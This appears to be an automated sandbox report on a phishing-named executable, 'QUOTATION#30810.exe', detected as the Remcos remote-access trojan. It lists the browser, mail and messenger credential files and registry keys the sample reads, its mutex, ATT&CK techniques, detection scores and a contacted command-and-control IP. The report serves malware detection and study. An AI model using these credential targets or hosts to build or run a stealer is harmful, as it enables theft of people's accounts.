Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 20_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

20_2_10002264

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 26_2_0041B60D GetUserNameW,

26_2_0041B60D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 26_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

26_2_00449190

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 32_2_0041739B GetVersionExW,

32_2_0041739B

Source: C:\Users\user\Desktop\QUOTATION#30810.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.25.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.25.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.25.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.25.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.25.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.1e1edc22508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.1750545324.000000000561A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4014378361.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.1916087250.0000000004E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4011008508.0000000000507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5880, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 4360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 6408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ngen.exe PID: 1112, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data		26_2_0040BA12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data		45_2_0040BA12

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	26_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: \key3.db	26_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	45_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: \key3.db	45_2_0040BB30

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: ESMTPPassword	37_2_004033F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	37_2_00402DB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	37_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match

File source: Process Memory Space: vbc.exe PID: 1160, type: MEMORYSTR

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-R7QS5C	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-R7QS5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-R7QS5C

Yara detected Remcos RAT

Source: Yara match	File source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.1e1edc22508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.1750545324.000000000561A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4014378361.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.1916087250.0000000004E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4011008508.0000000000507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5880, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 4360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 6408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ngen.exe PID: 1112, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: cmd.exe		26_2_0040569A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: cmd.exe		45_2_0040569A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	12 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	111 Native API	1 DLL Side-Loading	1 Bypass User Account Control	11 Deobfuscate/Decode Files or Information	211 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Windows Service	1 Access Token Manipulation	2 Obfuscated Files or Information	2 Credentials in Registry	1 System Service Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Windows Service	1 Timestomp	3 Credentials In Files	3 File and Directory Discovery	Distributed Component Object Model	211 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 Service Execution	1 Registry Run Keys / Startup Folder	422 Process Injection	1 DLL Side-Loading	LSA Secrets	39 System Information Discovery	SSH	3 Clipboard Data	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	1 Bypass User Account Control	Cached Domain Credentials	251 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	11 Masquerading	DCSync	41 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Proc Filesystem	4 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	422 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
QUOTATION#30810.exe	58%	ReversingLabs	ByteCode-MSIL.Trojan.Remcos
QUOTATION#30810.exe	49%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\svchost.exe	58%	ReversingLabs	ByteCode-MSIL.Trojan.Remcos
C:\Users\user\AppData\Roaming\svchost.exe	49%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
geoplugin.net	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.mi	0%	URL Reputation	safe
http://schemas.mi	0%	URL Reputation	safe
http://www.imvu.comr	0%	URL Reputation	safe
http://Passport.NET/STS	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	100%	URL Reputation	phishing
http://geoplugin.net/json.gp/C	100%	URL Reputation	phishing
http://Passport.NET/tb	0%	URL Reputation	safe
http://geoplugin.net/json.gp	100%	URL Reputation	phishing
http://www.ebuddy.com	0%	URL Reputation	safe
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	0%	Avira URL Cloud	safe
http://Passport.NET/tbA	0%	Avira URL Cloud	safe
http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpl	0%	Avira URL Cloud	safe
http://Passport.NET/tb_	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpCt	0%	Avira URL Cloud	safe
http://crl.ver)	0%	Avira URL Cloud	safe
172.245.208.13	0%	Avira URL Cloud	safe
http://Passport.NET/tbA	0%	Virustotal		Browse
https://login.microsofh	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpl	0%	Virustotal		Browse
http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd	0%	Virustotal		Browse
172.245.208.13	17%	Virustotal		Browse
http://Passport.NET/tb_	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
geoplugin.net	178.237.33.50	true	false	4%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://geoplugin.net/json.gp	true	URL Reputation: phishing	unknown
172.245.208.13	true	17%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdoft.c	svchost.exe, 0000001F.00000003.1792301764.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.mi	svchost.exe, 0000001F.00000003.1822570517.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.imvu.comr	vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/09/policy=80601	svchost.exe, 0000001F.00000003.3655794001.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657125389.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID	svchost.exe, 0000001F.00000003.1764573088.0000013DBB110000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf	svchost.exe, 0000001F.00000003.1764573088.0000013DBB110000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdody	svchost.exe, 0000001F.00000003.3657144064.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdQ	svchost.exe, 0000001F.00000003.3656628429.0000013DBB105000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live.com/inlinesignup.aspx?iww=1&id=80601=	svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdA	svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf	svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd.	svchost.exe, 0000001F.00000003.3657144064.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust	svchost.exe, 0000001F.00000003.3656046203.0000013DBB13D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.nirsoft.net	vbc.exe, 00000020.00000002.1858485035.0000000000EE4000.00000004.00000010.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com/ppsecure/ResolveUser.srf	svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://Passport.NET/tbA	svchost.exe, 0000001F.00000003.3657144064.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/MSARST2.srf	svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdns:sam	svchost.exe, 0000001F.00000003.1792301764.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp	false		high
http://Passport.NET/STS	svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID	svchost.exe, 0000001F.00000003.1816023590.0000013DBB157000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA	svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	vbc.exe, vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high
https://account.live.com/InlineSignup.aspx?iww=1&id=80502y0	svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	svchost.exe, 0000001F.00000003.3655794001.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657125389.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdcred	svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gp/C	svchost.exe, 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csc.exe, 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ngen.exe, 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp	true	URL Reputation: phishing URL Reputation: phishing	unknown
https://account.live.com/InlineSignup.aspx?iww=1&id=8	svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live.com/i	svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdpSe	svchost.exe, 0000001F.00000003.1792301764.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds	svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657217744.0000013DBB181000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823387561.0000013DBB17F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com/ppsecure/devicechangecredential.srf	svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.yahoo.com/config/login	vbc.exe	false		high
https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf	svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657087544.0000013DBB14C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3655928048.0000013DBB14A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://Passport.NET/tb	svchost.exe, 0000001F.00000003.1804618282.0000013DBB12E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1804618282.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	svchost.exe, 0000001F.00000003.1797644727.0000013DBA872000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live.com/InlineSignup.aspx?iww=1&id=80502	svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.nirsoft.net/	vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high
http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd	svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	QUOTATION#30810.exe, 00000000.00000002.1595193809.000001FC802E0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1926724115.0000022707615000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.1861743412.000001E1DDC19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.1814204610.0000017222011000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.1955305299.000001D080075000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.1926881023.0000017F2EE1D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM	svchost.exe, 0000001F.00000003.1765488006.0000013DBB127000.00000004.00000020.00020000.00000000.sdmp	false		high
https://signup.live.com/signup.aspx	svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB155000.00000004.00000020.00020000.00000000.sdmp	false		high
http://Passport.NET/tb_	svchost.exe, 0000001F.00000002.3658907381.0000013DBB6AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657976153.0000013DBA892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3658481481.0000013DBB600000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/MSARST2.srf=	svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp	false		high
